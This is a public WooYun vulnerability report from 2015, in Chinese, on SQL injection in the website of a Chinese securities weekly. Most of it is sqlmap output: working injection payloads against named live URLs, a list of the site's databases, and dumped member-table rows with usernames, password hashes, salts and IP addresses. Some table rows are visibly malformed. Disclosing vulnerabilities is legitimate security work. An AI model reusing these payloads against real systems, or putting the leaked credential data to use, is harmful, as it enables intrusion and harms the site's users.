漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0164930
漏洞标题:证券市场红周刊全服数据测漏千万数据+近50w会员数据测漏(打包)
相关厂商:北京融联信息传播有限公司
漏洞作者: 路人甲
提交时间:2015-12-26 20:17
修复时间:2016-02-08 18:23
公开时间:2016-02-08 18:23
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
证券市场红周刊全服数据测漏#千万数据+近50w会员数据测漏(打包)
详细说明:
同服的数据库都可以跨裤。一堆数据。就测试用户表
http://www.hongzhoukan.com/alipay/pay_hb_index.php hb=350&uid=88952634
http://www.hongzhoukan.com/red_player.php?id=143&pid=l0142j9uhh2
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=143 AND 6123=6123&pid=l0142j9uhh2
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=-4297 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7167787871,0x4e63774c534c44696566,0x7179736271),NULL,NULL,NULL#&pid=l0142j9uhh2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=143 AND SLEEP(5)&pid=l0142j9uhh2
---
web application technology: PHP 5.3.5
back-end DBMS: MySQL 5.0.11
available databases [7]:
[*] 88lc
[*] hzk
[*] hzkbbs7
[*] hzkbbsx2
[*] information_schema
[*] test
[*] ucenter
Database: ucenter
Table: uc_members
[10 entries]
+-----+---------+---------+--------+----------------+------------------------+---------+------------+-----------------+----------------------------------+-------------+---------------+
| uid | myid | myidkey | salt | regip | email | secques | regdate | username | password | lastloginip | lastlogintime |
+-----+---------+---------+--------+----------------+------------------------+---------+------------+-----------------+----------------------------------+-------------+---------------+
| 1 | <blank> | <blank> | 3247d1 | hidden | [email protected] | <blank> | 1165828117 | admin | 31340638138e4aa2274e936349a28af7 | 0 | 0 |
| 2 | <blank> | <blank> | 189164 | 192.168.10.194 | [email protected] | <blank> | 1165979465 | dingo | 655fb76fbd48e5e61526d88201c5559c | 0 | 0 |
| 3 | <blank> | <blank> | 998708 | 192.168.10.194 | [email protected] | <blank> | 1165988534 | yvonne_guo | 0aa748e68df3c682081fe7d4a09072c5 | 0 | 0 |
| 78 | <blank> | <blank> | 692890 | 202.99.16.67 | [email protected] | <blank> | 1168587796 | [email protected] | a9ebc2b7c01fd4e42811bfe5119f5234 | 0 | 0 |
| 5 | <blank> | <blank> | 191183 | 192.168.10.194 | [email protected] | <blank> | 1165998488 | 战猫 | bd8e754b3bc720e1a5b45c7bf29cbcfb | 0 | 0 |
| 6 | <blank> | <blank> | 540565 | 192.168.10.194 | [email protected] | <blank> | 1165999467 | qianaa | f076a08ab717fa17ef7a3d1faf613c94 | 0 | 0 |
| 7 | <blank> | <blank> | 674252 | 192.168.10.194 | [email protected] | <blank> | 1165999749 | 股往金来 | 8d91617eac115578f359b3e816847ee1 | 0 | 0 |
| 8 | <blank> | <blank> | 958051 | 192.168.10.194 | [email protected] | <blank> | 1165999835 | 钱柜 | dacc09a9e07299607e5fba1d742e5f7f | 0 | 0 |
| 9 | <blank> | <blank> | 858523 | 192.168.10.194 | [email protected] | <blank> | 1165999916 | kk1030 | a4453eaada59dce7a165acfd1132ed14 | 0 | 0 |
| 10 | <blank> | <blank> | 553604 | 192.168.10.194 | [email protected] | <blank> | 1165999960 | 点金 | 99c03cd55f5764eae3de7b5409809461 | 0 | 0 |
+-----+---------+---------+--------+----------------+------------------------+---------+------------+-----------------+----------------------------------+-------------+---------------+
back-end DBMS: MySQL 5.0.11
Database: hzkbbs7
Table: dnz_members
[5 entries]
+-----+---------+---------+---------+-------------+--------------+-----+-----+------------+----------------+-------+-----------------------------+--------+--------+--------+---------+---------+---------+------------+---------+------------+-----------------+-------------------------------------------+------------+-----------+-----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+---------------+
| uid | adminid | groupid | styleid | extgroupids | newbietaskid | ppp | tpp | bday | regip | posts | email | prompt | oltime | gender | pmsound | credits | threads | regdate | secques | lastpost | username | password | lastvisit | pageviews | invisible | sigstatus | showemail | customshow | newsletter | timeoffset | editormode | dateformat | timeformat | digestposts | accessmasks | groupexpiry | extcredits1 | extcredits2 | extcredits3 | extcredits4 | extcredits5 | extcredits6 | extcredits7 | extcredits8 | lastactivity | xspacestatus | customaddfeed |
+-----+---------+---------+---------+-------------+--------------+-----+-----+------------+----------------+-------+-----------------------------+--------+--------+--------+---------+---------+---------+------------+---------+------------+-----------------+-------------------------------------------+------------+-----------+-----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+---------------+
| 1 | 1 | 1 | 0 | 1\t16 | 0 | 0 | 0 | 0000-00-00 | hidden | 16 | [email protected] | 1 | 165 | 0 | 0 | 100668 | 3 | 1165828080 | <blank> | 1331544533 | admin | 60bc2fe160810abb39bb95745ddcc3f8 | 1331615053 | 14161 | 1 | 0 | 1 | 26 | 1 | 9999 | 2 | 0 | 0 | 0 | 0 | 0 | 10000 | 100668 | 0 | 0 | 0 | 0 | 0 | 0 | 1331619557 | 0 | 0 |
| 2 | 0 | 10 | 0 | <blank> | 0 | 0 | 0 | 0000-00-00 | 192.168.10.194 | 0 | [email protected] | 1 | 0 | 0 | 1 | 0 | 0 | 11659 9465 | <blank> | 0 | dingo | 74aa8191ed86aab32c321d1ae6ad064c | 1306387426 | 0 | 0 | 0 | 1 | 26 | 1 | 9999 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1310046573 | 0 | 0 |
| 3 | 0 | 10 | 0 | <blank> | 0 | 0 | 0 | 0000-00-00 | 192.168.10.194 | 0 | [email protected] | 1 | 0 | 0 | 1 | 0 | 0 | 1165988534 | <blank> | 0 | yvonne_guo | 97f014516561ef487ec368d6158eb3f4 (silver) | 1165988534 | 0 | 0 | 0 | 1 | 26 | 1 | 9999 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1165988534 | 0 | 0 |
| 78 | 0 | 10 | 0 | <blank> | 0 | 0 | 0 | 0000-00-00 | 202.99.16.67 | 0 | [email protected] | 1 | 0 | 0 | 1 | 0 | 0 | 1168587796 | <blank> | 0 | [email protected] | 0640059ea6974a9a460e3dd282afd964 | 1168587796 | 0 | 0 | 0 | 1 | 26 | 1 | 9999 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1168587796 | 0 | 0 |
| 0 | 0000-00-00 | 10 | 26 | 2 | 0 | 0 | 0 | 0 |
+-----+---------+---------+---------+-------------+--------------+-----+-----+------------+----------------+-------+-----------------------------+--------+--------+--------+---------+---------+---------+------------+---------+------------+-----------------+-------------------------------------------+------------+-----------+-----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+---------------+
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)